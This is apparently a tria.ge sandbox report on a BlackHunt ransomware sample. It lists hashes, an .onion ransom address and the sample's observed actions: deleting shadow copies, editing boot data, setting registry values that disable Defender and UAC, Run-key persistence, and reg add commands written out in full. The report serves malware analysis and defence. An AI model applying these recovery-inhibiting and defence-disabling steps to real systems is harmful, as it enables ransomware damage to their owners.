Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
189s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:23
Static task
static1
Behavioral task
behavioral1
Sample
a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe
Resource
win10v2004-20231215-en
General
-
Target
a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe
-
Size
707KB
-
MD5
d7e7da5e3d6892e3a418e000b5802ddb
-
SHA1
88155907506407813cb9a640b947b3a455505bd1
-
SHA256
a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361
-
SHA512
77854b1f324908611c26c63f3cd62d599bbe3576521e80b66fe9d493fa0254b75414cfefbd4393f8d2df3eb58c0d21c9423003ae21f50a3ea3e80484e7a9b21f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza168bvnh:6uaTmkZJ+naie5OTamgEoKxLWBLh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6036 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6168 bcdedit.exe 6040 bcdedit.exe -
Renames multiple (615) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5976 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\P: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\U: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\Z: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\N: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\S: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\J: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\K: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\B: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\M: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\X: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\Q: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\T: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\I: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\A: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\E: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\Y: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\L: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\O: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\G: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened (read-only) \??\H: a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\profile.jfc a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaSansDemiBold.ttf a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\local_policy.jar a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\ClearCompress.ps1 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\RequestDismount.midi a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\dotnet\shared\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\icu.md a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\resources.jar a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\accessibility.properties a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkDrop32x32.gif a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\unicode.md a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterRegular.ttf a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\#BlackHunt_Private.key a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5388 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6016 vssadmin.exe 6164 vssadmin.exe 3968 vssadmin.exe 6020 vssadmin.exe 5980 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeRestorePrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeBackupPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeTakeOwnershipPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeAuditPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeSecurityPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeIncBasePriorityPrivilege 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Token: SeBackupPrivilege 6244 wbengine.exe Token: SeRestorePrivilege 6244 wbengine.exe Token: SeSecurityPrivilege 6244 wbengine.exe Token: SeBackupPrivilege 5188 vssvc.exe Token: SeRestorePrivilege 5188 vssvc.exe Token: SeAuditPrivilege 5188 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3940 wrote to memory of 368 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 89 PID 3940 wrote to memory of 368 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 89 PID 3940 wrote to memory of 4500 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 92 PID 3940 wrote to memory of 4500 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 92 PID 3940 wrote to memory of 4496 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 93 PID 3940 wrote to memory of 4496 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 93 PID 3940 wrote to memory of 2560 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 95 PID 3940 wrote to memory of 2560 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 95 PID 3940 wrote to memory of 2176 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 97 PID 3940 wrote to memory of 2176 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 97 PID 3940 wrote to memory of 4544 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 99 PID 3940 wrote to memory of 4544 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 99 PID 3940 wrote to memory of 3564 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 108 PID 3940 wrote to memory of 3564 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 108 PID 3940 wrote to memory of 2168 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 100 PID 3940 wrote to memory of 2168 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 100 PID 3940 wrote to memory of 4768 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 107 PID 3940 wrote to memory of 4768 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 107 PID 3940 wrote to memory of 2740 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 105 PID 3940 wrote to memory of 2740 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 105 PID 3940 wrote to memory of 5016 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 104 PID 3940 wrote to memory of 5016 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 104 PID 3940 wrote to memory of 1432 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 118 PID 3940 wrote to memory of 1432 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 118 PID 3940 wrote to memory of 920 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 111 PID 3940 wrote to memory of 920 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 111 PID 3940 wrote to memory of 3060 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 117 PID 3940 wrote to memory of 3060 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 117 PID 3940 wrote to memory of 1840 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 115 PID 3940 wrote to memory of 1840 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 115 PID 3940 wrote to memory of 4960 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 120 PID 3940 wrote to memory of 4960 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 120 PID 3940 wrote to memory of 4744 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 122 PID 3940 wrote to memory of 4744 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 122 PID 3940 wrote to memory of 3056 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 129 PID 3940 wrote to memory of 3056 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 129 PID 3940 wrote to memory of 688 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 128 PID 3940 wrote to memory of 688 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 128 PID 3940 wrote to memory of 1316 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 126 PID 3940 wrote to memory of 1316 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 126 PID 3940 wrote to memory of 3460 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 125 PID 3940 wrote to memory of 3460 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 125 PID 3940 wrote to memory of 816 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 131 PID 3940 wrote to memory of 816 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 131 PID 3940 wrote to memory of 2448 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 134 PID 3940 wrote to memory of 2448 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 134 PID 3940 wrote to memory of 1304 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 138 PID 3940 wrote to memory of 1304 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 138 PID 3940 wrote to memory of 4236 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 137 PID 3940 wrote to memory of 4236 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 137 PID 3940 wrote to memory of 448 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 135 PID 3940 wrote to memory of 448 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 135 PID 3940 wrote to memory of 3420 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 148 PID 3940 wrote to memory of 3420 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 148 PID 368 wrote to memory of 1908 368 cmd.exe 140 PID 368 wrote to memory of 1908 368 cmd.exe 140 PID 3940 wrote to memory of 1396 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 141 PID 3940 wrote to memory of 1396 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 141 PID 4500 wrote to memory of 4908 4500 cmd.exe 145 PID 4500 wrote to memory of 4908 4500 cmd.exe 145 PID 3940 wrote to memory of 4684 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 142 PID 3940 wrote to memory of 4684 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 142 PID 4496 wrote to memory of 4572 4496 cmd.exe 144 PID 3940 wrote to memory of 2460 3940 a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe"C:\Users\Admin\AppData\Local\Temp\a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4908
-
-
-
